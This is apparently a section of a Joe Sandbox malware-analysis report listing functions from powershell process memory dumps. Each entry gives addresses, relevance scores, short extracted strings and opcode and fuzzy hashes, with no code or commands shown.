                                                                          • Opcode Fuzzy Hash: e4aca9de1c1d647f55013429edd79f778e0e6c7c35d2c3c2efd8b0a4cecc7555
                                                                          • Instruction Fuzzy Hash: 69F1B430918A8D8FEBA8DF28C8557E977E1FF54750F14426EE84DC7295CB38A845CB82
                                                                          Function 00007FF886ECD602 Relevance: .5, Instructions: 460COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2021496288.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ff886ec0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca060b78469880a0098436e7c9b85d9873af251c26efacec28d8fab5bef2e490
                                                                          • Instruction ID: c1ddd01d6072095515044b6202749960f78d1d6c1fd4379a16701d5811067ae3
                                                                          • Opcode Fuzzy Hash: ca060b78469880a0098436e7c9b85d9873af251c26efacec28d8fab5bef2e490
                                                                          • Instruction Fuzzy Hash: 82E1B230918A4E8FEBA8DF28C8557E977E1FF54350F14426AE84DC7291DF79A841CB82
                                                                          Function 00007FF886F99CC9 Relevance: .5, Instructions: 479COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2022365158.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ff886f90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fe482649f897917e0bb8c3bca773bc6d5750584ea7724ba979f5d51f146df7d3
                                                                          • Instruction ID: 6e0e2aa8f9308904ae55442a6eb0c875924219564ed14d33a87a5dc6909a9180
                                                                          • Opcode Fuzzy Hash: fe482649f897917e0bb8c3bca773bc6d5750584ea7724ba979f5d51f146df7d3
                                                                          • Instruction Fuzzy Hash: A4E10332D0DA8E8FE796DA6848556B8BBE1FF593A4B4D01BAD04DC71E2DE18EC05C341
                                                                          Function 00007FF886F94B35 Relevance: .4, Instructions: 438COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2022365158.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ff886f90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: de4a7a7b030ebf97e032ff0d416bf1b86d8931f17b099f27d4d895fbae5fc3ac
                                                                          • Instruction ID: c5f68666f1f306fcec24899ccae4243d352aaf70d1545ccfa811be0ae2476dca
                                                                          • Opcode Fuzzy Hash: de4a7a7b030ebf97e032ff0d416bf1b86d8931f17b099f27d4d895fbae5fc3ac
                                                                          • Instruction Fuzzy Hash: 30D10131D2DA8E9FE7A6EA6848155B57BA1FF65394B0801FED44CCB193E918EC09C342
                                                                          Function 00007FF886EC585C Relevance: .3, Instructions: 278COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2021496288.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ff886ec0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 731849447d49a963985c74504f62dbbd02834d4564b5921dbf8e17174bf9c354
                                                                          • Instruction ID: e9a5b0e42ecec88c9577004ffd924a1fec5b6889c6b132d77788ebe7e0e99901
                                                                          • Opcode Fuzzy Hash: 731849447d49a963985c74504f62dbbd02834d4564b5921dbf8e17174bf9c354
                                                                          • Instruction Fuzzy Hash: 7891F63091CA8D8FEBA4DF28C8557E97BE1FF59350F14426AD44DC7292CE38A845CB82
                                                                          Function 00007FF886F99E67 Relevance: .2, Instructions: 156COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2022365158.00007FF886F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ff886f90000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4f68f4f80a3ae0f897528c2940b5ba160c69412389ddb7b13d6a5daeb618f1de
                                                                          • Instruction ID: dcfcb2a1983386ab21e3fa4885aab8b4c2e78492a435928b8c388b55baa7919b
                                                                          • Opcode Fuzzy Hash: 4f68f4f80a3ae0f897528c2940b5ba160c69412389ddb7b13d6a5daeb618f1de
                                                                          • Instruction Fuzzy Hash: 4E51A422D1EA8E8BE795E66848516B4AAD1FF553A8B5E01F9E40DC71E2DD1CDC44C301
                                                                          Function 00007FF886EC3945 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2021496288.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ff886ec0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction ID: 3d6d609d73e80a46cadc5b3ef30eff9ead05fdca0b75c7a3ac020bd641cfe81b
                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction Fuzzy Hash: ED01677111CB0C4FD744EF0CE455AA5B7E0FB95364F10066EE58AC3655DA36E881CB46

                                                                          Non-executed Functions

                                                                          Function 00007FF886ECC359 Relevance: .4, Instructions: 416COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2021496288.00007FF886EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ff886ec0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d1c5ddcb5363ae2bc61d61fc9e022eee42acf1b319e7147af5c6ffbd181cfeb5
                                                                          • Instruction ID: 019b8fdb189ef6d6988ee589827ae12e4b5b1e9d7f3ae9fac1d9212b4a7ec4f1
                                                                          • Opcode Fuzzy Hash: d1c5ddcb5363ae2bc61d61fc9e022eee42acf1b319e7147af5c6ffbd181cfeb5
                                                                          • Instruction Fuzzy Hash: C9D1A230918A898FEB68DF28C8557F977E1FF59750F14426EE84DC7291CB78A841CB82

                                                                          Executed Functions

                                                                          Function 0721E105 Relevance: 7.0, Strings: 5, Instructions: 704COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$x.k$x.k$-k$-k
                                                                          • API String ID: 0-1059763770
                                                                          • Opcode ID: b4f6fc308e1a7835b580e2bdce0e3136e4b5147f8e9b146f4af33b246fb13140
                                                                          • Instruction ID: b15f77609fce7a0866d03ca18c64098147dfd291ce4a3a357f2e5c6a015412dd
                                                                          • Opcode Fuzzy Hash: b4f6fc308e1a7835b580e2bdce0e3136e4b5147f8e9b146f4af33b246fb13140
                                                                          • Instruction Fuzzy Hash: 97626EB0A10219DFDB24DB28C991BDEB7B2BF89304F1085A9D9096B741CB75DE81CF91
                                                                          Function 072192CB Relevance: 4.1, Strings: 3, Instructions: 387COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$x.k$-k
                                                                          • API String ID: 0-3142358075
                                                                          • Opcode ID: c208d1a0baca6a57e3faed97c7831f07fc1bd0a53adea2b06fbed36357a733ff
                                                                          • Instruction ID: b7723b07dc79ce9d255393ab36c912d032ea3909eee01fccba4c7a4d2b6b314e
                                                                          • Opcode Fuzzy Hash: c208d1a0baca6a57e3faed97c7831f07fc1bd0a53adea2b06fbed36357a733ff
                                                                          • Instruction Fuzzy Hash: BBF19EB0A102159FEB24DB18C951FAEB7B6BF84300F10C5A9D5096FB91DB71ED818F91
                                                                          Function 0721E828 Relevance: 4.1, Strings: 3, Instructions: 363COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$x.k$-k
                                                                          • API String ID: 0-3142358075
                                                                          • Opcode ID: fc9671f5e5ff7a5c129b329ce6949c37b8bf7b935c4bc0a62ad08837d93a7276
                                                                          • Instruction ID: 83e5afced18f9e45f963b6f439c66594157b0382b7636d2afbd2886b2221ecdd
                                                                          • Opcode Fuzzy Hash: fc9671f5e5ff7a5c129b329ce6949c37b8bf7b935c4bc0a62ad08837d93a7276
                                                                          • Instruction Fuzzy Hash: 64E190B0B002189FD714DB68C895BAEB7B2BF84304F1185A9D909AF791CF75DE818F91
                                                                          Function 072177A8 Relevance: 3.4, Strings: 2, Instructions: 938COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 84l$84l
                                                                          • API String ID: 0-1651897244
                                                                          • Opcode ID: 1c425ee24ae9f04d3a13c8ff63923e0e86a342c6ed28be268a24a07494b040b9
                                                                          • Instruction ID: b250f21ea0cbd530a54730e0012b8458b429297d523bb1ab9c913e29d805e25e
                                                                          • Opcode Fuzzy Hash: 1c425ee24ae9f04d3a13c8ff63923e0e86a342c6ed28be268a24a07494b040b9
                                                                          • Instruction Fuzzy Hash: 23825AB0B202069FDB14CB98C481B6ABBF2BF99314F25C169E8059F755DB72EC41CB91
                                                                          Function 0721F539 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$x.k
                                                                          • API String ID: 0-2289991263
                                                                          • Opcode ID: 43d1ceb854fa89d78625877b49bdbff927ed93bcce18f21f7df5fc753a1190d6
                                                                          • Instruction ID: 12a9aec92776f5e69cd21bd0de64e6c0638e39ce8768be8a3f3239767d5b3d0d
                                                                          • Opcode Fuzzy Hash: 43d1ceb854fa89d78625877b49bdbff927ed93bcce18f21f7df5fc753a1190d6
                                                                          • Instruction Fuzzy Hash: 80023AB4A00219DFDB24DB14C991BEDB7B2BB89304F1081EAD909AB741DB75DE81CF91
                                                                          Function 07218DD1 Relevance: 2.8, Strings: 2, Instructions: 349COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$-k
                                                                          • API String ID: 0-766683181
                                                                          • Opcode ID: df102998fb6d805382e19ee6a51fa97a10a20b61cf67859c23edafa9b66640c9
                                                                          • Instruction ID: da6e5d3767306aa00c25f24ee32c1c70350de60239e9d9d185d5a8240e719f2a
                                                                          • Opcode Fuzzy Hash: df102998fb6d805382e19ee6a51fa97a10a20b61cf67859c23edafa9b66640c9
                                                                          • Instruction Fuzzy Hash: 05E182B4B102159FDB24DB58C891B9EBBB2BF84304F2085AAD5096F741CB75ED81CF91
                                                                          Function 0721A068 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$-k
                                                                          • API String ID: 0-766683181
                                                                          • Opcode ID: bdfb19e2d1c49778d69774e0b8b7c277c442322bcd57d477328d58adf4dd292b
                                                                          • Instruction ID: 937ba7311feadafbbc537a16aca86ec1a53666f76cf26fe047ae79e201f29c4c
                                                                          • Opcode Fuzzy Hash: bdfb19e2d1c49778d69774e0b8b7c277c442322bcd57d477328d58adf4dd292b
                                                                          • Instruction Fuzzy Hash: 73D18EB0A212099FDB14DBA8C495B9EB7F2BF88304F25C529D4016F755CB76EC42CB91
                                                                          Function 0721A048 Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$-k
                                                                          • API String ID: 0-766683181
                                                                          • Opcode ID: 2ffaf4048886010f4244914ae35f51e37caab529f7f86d6e8397fb7ccb664563
                                                                          • Instruction ID: 034e626c72124725653feef1e0f16f0e26792276a04dd9113a4d505a13c9d5a7
                                                                          • Opcode Fuzzy Hash: 2ffaf4048886010f4244914ae35f51e37caab529f7f86d6e8397fb7ccb664563
                                                                          • Instruction Fuzzy Hash: 1AB1BEB0A252059FDB14DB98C484B9EBBF2BF88304F25C12AD4056F755CB76EC82CB91
                                                                          Function 0721EF6A Relevance: 2.7, Strings: 2, Instructions: 222COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$-k
                                                                          • API String ID: 0-766683181
                                                                          • Opcode ID: 04b9aaaf8498dfd8957e47d2e06aef8396832d9b860a8e17dd3d75d8644b8f38
                                                                          • Instruction ID: e4275ffe213aa8088931abc760f07dc7d83e1674c9e284bebbc6fb7904ac4a7f
                                                                          • Opcode Fuzzy Hash: 04b9aaaf8498dfd8957e47d2e06aef8396832d9b860a8e17dd3d75d8644b8f38
                                                                          • Instruction Fuzzy Hash: 88A138B0A11219DBDB24DB18C991BEEB7B2BB89304F1081E5D9096B741CB75DE81CF91
                                                                          Function 07218510 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k
                                                                          • API String ID: 0-3814145804
                                                                          • Opcode ID: d0309580df3b14febd808c7e8c6b2cd09ce4c7e6f10d62618ea4b8bcfdd671ae
                                                                          • Instruction ID: 1fabbc5fc45aa9aac7e4479a06b5640d906a8d0ebd0026f500738994076a5b4e
                                                                          • Opcode Fuzzy Hash: d0309580df3b14febd808c7e8c6b2cd09ce4c7e6f10d62618ea4b8bcfdd671ae
                                                                          • Instruction Fuzzy Hash: 7691A1B4B202059FD714DB58C585BAEB7F2BF88310F208029E5016FB91DB76EC42CB91
                                                                          Function 072184E8 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k
                                                                          • API String ID: 0-3814145804
                                                                          • Opcode ID: 4dbf722715b46466010796c6ea78d77b7c1f9e0e9bcd29a4c72b462054c9f2fe
                                                                          • Instruction ID: 02842b7f02456cdb670362a6cfee3730adeff6eb9bc1733ef19050c7dd851d54
                                                                          • Opcode Fuzzy Hash: 4dbf722715b46466010796c6ea78d77b7c1f9e0e9bcd29a4c72b462054c9f2fe
                                                                          • Instruction Fuzzy Hash: D391D4B4A202059FD700CB54C585B9EBBF2BF88314F258069E5016F791CB76EC82CB91
                                                                          Function 0721A48E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k
                                                                          • API String ID: 0-3814145804
                                                                          • Opcode ID: f89e94d2902b1d2e922c1cdb0ccae1ac3f067b7a95433acb927bf3af0ad24ce2
                                                                          • Instruction ID: 1dea7e7a908ea62be972c0afecd719df50b88f9db1cf40bfbdee1956f46a6795
                                                                          • Opcode Fuzzy Hash: f89e94d2902b1d2e922c1cdb0ccae1ac3f067b7a95433acb927bf3af0ad24ce2
                                                                          • Instruction Fuzzy Hash: 86319374B51204ABE704EB64C855BAE77B3AF84344F24C429E9016FB91CEBADC428B91
                                                                          Function 072163CC Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 84l
                                                                          • API String ID: 0-1480273888
                                                                          • Opcode ID: bffb0852c3ff0bccb9c81d18eba767d9f68616ada600cc93cb65cc06a04d9e13
                                                                          • Instruction ID: d99b431c6b0f64aee2908a82ea88e40a9bbe9a2f625b90f1d53829254b9d0e39
                                                                          • Opcode Fuzzy Hash: bffb0852c3ff0bccb9c81d18eba767d9f68616ada600cc93cb65cc06a04d9e13
                                                                          • Instruction Fuzzy Hash: 63313970611356DFD721CB94C810BAAFBF1BF45320F24846AE545AF352CA71DC02C7A1
                                                                          Function 00F6CF10 Relevance: .5, Instructions: 521COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2dac7232cb15a7cd469a47175dfd45b9519a4305b405c7680ceb72bada910b21
                                                                          • Instruction ID: 2d56a8eacd8ae5bec68565191b74796b8a2cdbbf539a6775a213e7ddc0784d1f
                                                                          • Opcode Fuzzy Hash: 2dac7232cb15a7cd469a47175dfd45b9519a4305b405c7680ceb72bada910b21
                                                                          • Instruction Fuzzy Hash: D9226E34B002189FCB25DB35D955AAEB7F2AF89340F1480A9D40AAB361DF35DE85DF81
                                                                          Function 0721815D Relevance: .5, Instructions: 483COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 87de5bd268f8642aa54bce6815531e55756263daa6a982fae0793b1ef30bb37e
                                                                          • Instruction ID: 97344cf5d5ac5e8b94ec15b38424498d9a700bed4ffbda323b8869daafa21011
                                                                          • Opcode Fuzzy Hash: 87de5bd268f8642aa54bce6815531e55756263daa6a982fae0793b1ef30bb37e
                                                                          • Instruction Fuzzy Hash: 0A1269B4A20206DFDB10CB98C581BAABBF2BF99314F25C169E8059F755CB72EC41CB51
                                                                          Function 07210638 Relevance: .3, Instructions: 326COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d43cfc838a8d4613542bced733c9498421cf928ec3b30417c501811c5e3bc1df
                                                                          • Instruction ID: df9eafb5a4bd5173369056bc0f7f5687c1107703a566b0f282f7c7af7dea9752
                                                                          • Opcode Fuzzy Hash: d43cfc838a8d4613542bced733c9498421cf928ec3b30417c501811c5e3bc1df
                                                                          • Instruction Fuzzy Hash: CCB115B1B24346CFDB348A69D41176ABBE2FFE5210F29806BD8058B641DB75C981CBA1
                                                                          Function 00F6AD90 Relevance: .3, Instructions: 313COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba48707e36607392daf8474a01da8a927028fb96f5cbee80663b78d90cc13fdd
                                                                          • Instruction ID: a3b2bfdd06fa8f8275b78d1ace0952d89deb4ebc9a4d3d8a9fd39a7c615f642f
                                                                          • Opcode Fuzzy Hash: ba48707e36607392daf8474a01da8a927028fb96f5cbee80663b78d90cc13fdd
                                                                          • Instruction Fuzzy Hash: 49C18B31A002089FCB15DFA4C994A9DBBF2FF85310F154569E406EB365DB34ED89DB81
                                                                          Function 00F63670 Relevance: .3, Instructions: 313COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2294dcfb210898c7b5143e4504d4e680847f4ea3062ce91f6b6688d791c0aa51
                                                                          • Instruction ID: 4e1f46cb2afff68cc232a5bcefe4079b30999bbfbb387d0256fe48276296bb8f
                                                                          • Opcode Fuzzy Hash: 2294dcfb210898c7b5143e4504d4e680847f4ea3062ce91f6b6688d791c0aa51
                                                                          • Instruction Fuzzy Hash: E0D10374E01209AFDB05CFA8D584A9DFBB2EF49310F248159E805AB366C735EE81DB90
                                                                          Function 00F69300 Relevance: .3, Instructions: 286COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0304efdc0cf493bce2e4e8cd07d4666e45cbeffef1a25885d9b6bd182d4039fe
                                                                          • Instruction ID: 499253c74d3df29e15f05380e000ac7277241f61b63b3ee877c4fd0191c7cfcb
                                                                          • Opcode Fuzzy Hash: 0304efdc0cf493bce2e4e8cd07d4666e45cbeffef1a25885d9b6bd182d4039fe
                                                                          • Instruction Fuzzy Hash: 2E91396240E3E15FD7039B3898715EABFB5AE4321070A41C7D090CF2A3D529AD4DC7BA
                                                                          Function 072108C2 Relevance: .2, Instructions: 250COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44f07a1ffd6a873d325769cf6ee6d19c1015c53f40b81d45924ee6b7841ebfe1
                                                                          • Instruction ID: 535be5f61634b733ef804d4812b42efa79b666083aea50fd7214b999c714499c
                                                                          • Opcode Fuzzy Hash: 44f07a1ffd6a873d325769cf6ee6d19c1015c53f40b81d45924ee6b7841ebfe1
                                                                          • Instruction Fuzzy Hash: 088159B2728346DFD7218B65C81076BBBF5FFD6211F29806BD885CB252CA35C981C7A1
                                                                          Function 00F6AAC8 Relevance: .2, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ed584efffccd46db3aac6e0a021df2dd8ed07d92ac3f14f33d99d570f273e196
                                                                          • Instruction ID: 30f65c015eef91701f872988b8f0407809a71ad5d308365ae6a5ba1b4c84abba
                                                                          • Opcode Fuzzy Hash: ed584efffccd46db3aac6e0a021df2dd8ed07d92ac3f14f33d99d570f273e196
                                                                          • Instruction Fuzzy Hash: 65919D30A012049FC714DFA8D844AAEBBF2FF89310F198569E445AB762CB35ED45DF50
                                                                          Function 07215FC0 Relevance: .2, Instructions: 201COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e23a6f288605726a08d6a44a5f876bb64d45fb3d2b1c8d79410a2aa6bc4834e2
                                                                          • Instruction ID: 0dbd87ab2842fb8eb2828d714d258c314a872609cb1521a2cec75894a0209bb4
                                                                          • Opcode Fuzzy Hash: e23a6f288605726a08d6a44a5f876bb64d45fb3d2b1c8d79410a2aa6bc4834e2
                                                                          • Instruction Fuzzy Hash: A361F3B1724346DFDB258B65C80076ABBF1BF96211F2AC0ABD845CB292DF76C841C761
                                                                          Function 00F68DBE Relevance: .2, Instructions: 188COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6506afbaafda17e893e5722f87460a20c450042e34442b6da8c69065442b3789
                                                                          • Instruction ID: ef10b437a465f687c781a09e6021f70b897435e9b05f4ca17ff2b617421d8caa
                                                                          • Opcode Fuzzy Hash: 6506afbaafda17e893e5722f87460a20c450042e34442b6da8c69065442b3789
